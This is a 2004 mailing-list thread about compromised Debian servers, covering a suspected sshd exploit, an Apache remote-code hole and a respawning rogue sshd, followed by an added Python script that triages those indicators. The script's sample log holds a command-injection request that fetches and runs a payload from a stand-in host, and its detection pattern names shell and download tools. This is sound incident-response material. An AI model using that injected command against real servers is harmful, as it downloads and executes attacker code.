The second box that was hacked was a gateway machine to a private
network and the *only* listening port was ssh!
When I saw the first machine initially, I was convinced it was an
apache/php problem... until I found the second machine was compromised.
On Wed, Aug 04, 2004 at 09:04:26PM +0100, Ken Gilmour wrote:
> On Wed, 4 Aug 2004 15:09:15 +0100, Eoin Ryan wrote:
> > Hi all,
> > There appears to be a new exploit of sshd on Debian Woody. Ssh
> > version:
> > SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1.woody.3
>
> Ok this is the conclusion I have come to on this problem. I cannot find
> any patches on that and none of my security team seem to know anything
> about it which is quite unusual, it's also unusual for Debian to go that
> long without issuing a patch.
>
> A few months ago we discovered a root kit which looks similar to this...
> same IRC bot etc. It was actually an apache vulnerability at the time
> where the exploit was. You can find this by looking at your apache logs.
>
> What could be done was that you could hit the apache vulnerability,
> execute remote code and setup an ssh daemon on another port, that's when
> you will see the failed ssh logins, almost the exact same deal.
>
> If the daemon is stopped it will keep coming back. There was a process
> running similar to kscand (similar, can't remember exact name). Once that
> was stopped ssh stopped coming back.
>
> So check your apache logs... if there is nothing unusual (god forbid)
> then it may be a brand new vulnerability.
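An added example, not part of the thread or of any tool the posters mention: a small Python triage script for the three indicators Ken describes above, a suspicious request in the Apache access log, an ssh daemon listening on a port other than 22, and a userland process that calls itself after a kernel thread such as kscand. The access-log lines, the netstat and ps output, the port number and the paths in the samples are all constructed for illustration, and the request-line markers are heuristics, not signatures for any particular Apache/PHP bug.

```python
"""Triage helpers for the indicators described in the thread.

Inputs are plain text as produced by the usual tools:
  - Apache access log in common/combined format
  - `netstat -lntp` output
  - `ps -eo pid,comm,args` output (header line skipped)
All sample data below is constructed for this example.
"""
import re
from typing import Dict, List, Optional, Tuple

# --- Apache access log ---------------------------------------------------------
APACHE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" (?P<status>\d{3}) (?P<size>\S+)'
)
# Heuristic markers of "execute remote code" attempts in a request line:
# shell metacharacters, shell paths, download tools, NUL bytes, traversal.
# Assumption: illustrative only; tune to the environment to cut false positives.
SUSPICIOUS_RE = re.compile(
    r'(%3b|;|\||`|\$\(|/bin/sh|/bin/bash|\bwget\b|\bcurl\b|%00|\.\./)',
    re.IGNORECASE,
)

def parse_apache(line: str) -> Optional[Dict[str, str]]:
    m = APACHE_RE.match(line)
    return m.groupdict() if m else None

def flag_apache_lines(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client_ip, request_path, first_marker_hit) for suspicious requests."""
    hits = []
    for line in lines:
        rec = parse_apache(line)
        if rec is None:
            continue
        m = SUSPICIOUS_RE.search(rec['path'])
        if m:
            hits.append((rec['ip'], rec['path'], m.group(1)))
    return hits

# --- Listening sockets (netstat -lntp) ----------------------------------------
NETSTAT_RE = re.compile(
    r'^(?P<proto>tcp6?)\s+\d+\s+\d+\s+(?P<local>\S+)\s+\S+\s+LISTEN\s+(?P<pid>\d+|-)/?(?P<prog>\S*)'
)

def rogue_ssh_listeners(netstat_lines: List[str], expected_port: int = 22) -> List[Tuple[int, str, str]]:
    """Return (port, pid, program) for ssh-named daemons not on expected_port."""
    found = []
    for line in netstat_lines:
        m = NETSTAT_RE.match(line)
        if not m:
            continue
        port = int(m.group('local').rsplit(':', 1)[1])   # works for 0.0.0.0:22 and :::22
        prog = m.group('prog')
        if 'ssh' in prog.lower() and port != expected_port:
            found.append((port, m.group('pid'), prog))
    return found

# --- Processes impersonating kernel threads -----------------------------------
# A real kernel thread has an empty /proc/<pid>/cmdline, so ps shows it as
# [name]; a userland binary merely named "kscand" shows a real command line.
KERNEL_THREAD_NAMES = {'kswapd', 'kscand', 'kreclaimd', 'bdflush', 'kupdated',
                       'keventd', 'ksoftirqd', 'kjournald'}
PS_RE = re.compile(r'^\s*(?P<pid>\d+)\s+(?P<comm>\S+)\s+(?P<cmd>.*)$')

def kernel_thread_impostors(ps_lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (pid, comm, cmdline) for kernel-thread-named processes with a real cmdline."""
    out = []
    for line in ps_lines:
        m = PS_RE.match(line)
        if not m:
            continue
        comm, cmd = m.group('comm'), m.group('cmd').strip()
        base = re.sub(r'[/_]?(CPU)?\d+$', '', comm, flags=re.IGNORECASE)  # ksoftirqd_CPU0 -> ksoftirqd
        if base in KERNEL_THREAD_NAMES and not cmd.startswith('['):
            out.append((m.group('pid'), comm, cmd))
    return out

# --- Constructed sample data ---------------------------------------------------
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [04/Aug/2004:20:51:02 +0100] "GET /index.php HTTP/1.1" 200 5123',
    '10.0.0.5 - - [04/Aug/2004:20:51:03 +0100] "GET /images/logo.png HTTP/1.1" 200 812',
    '192.0.2.77 - - [04/Aug/2004:21:02:44 +0100] "GET /cgi-bin/test.cgi?cmd=;wget%20http://192.0.2.9/x;/bin/sh%20x HTTP/1.0" 200 233',
]
SAMPLE_NETSTAT = [
    'tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      412/sshd',
    'tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      501/apache',
    'tcp        0      0 0.0.0.0:3879            0.0.0.0:*               LISTEN      8871/sshd',
]
SAMPLE_PS = [
    '    2 keventd         [keventd]',
    '    4 kswapd          [kswapd]',
    '    6 kscand          [kscand]',
    ' 8870 kscand          /tmp/.ICE-unix/kscand -c /tmp/.ICE-unix/x.conf',
    ' 8871 sshd            /tmp/.ICE-unix/sshd -p 3879',
]

if __name__ == '__main__':
    print('suspicious requests :', flag_apache_lines(SAMPLE_ACCESS_LOG))
    print('rogue ssh listeners :', rogue_ssh_listeners(SAMPLE_NETSTAT))
    print('kernel-thread fakes :', kernel_thread_impostors(SAMPLE_PS))
```

On a live box, feed the functions the real files and command output (`/var/log/apache/access.log`, `netstat -lntp`, `ps -eo pid,comm,args`), and treat a hit in all three as the chain Ken describes: the request that got code execution, the respawning sshd on a high port, and the watchdog process that brings it back. Pull the evidence before killing anything, since stopping the impostor is what makes the listener stay down.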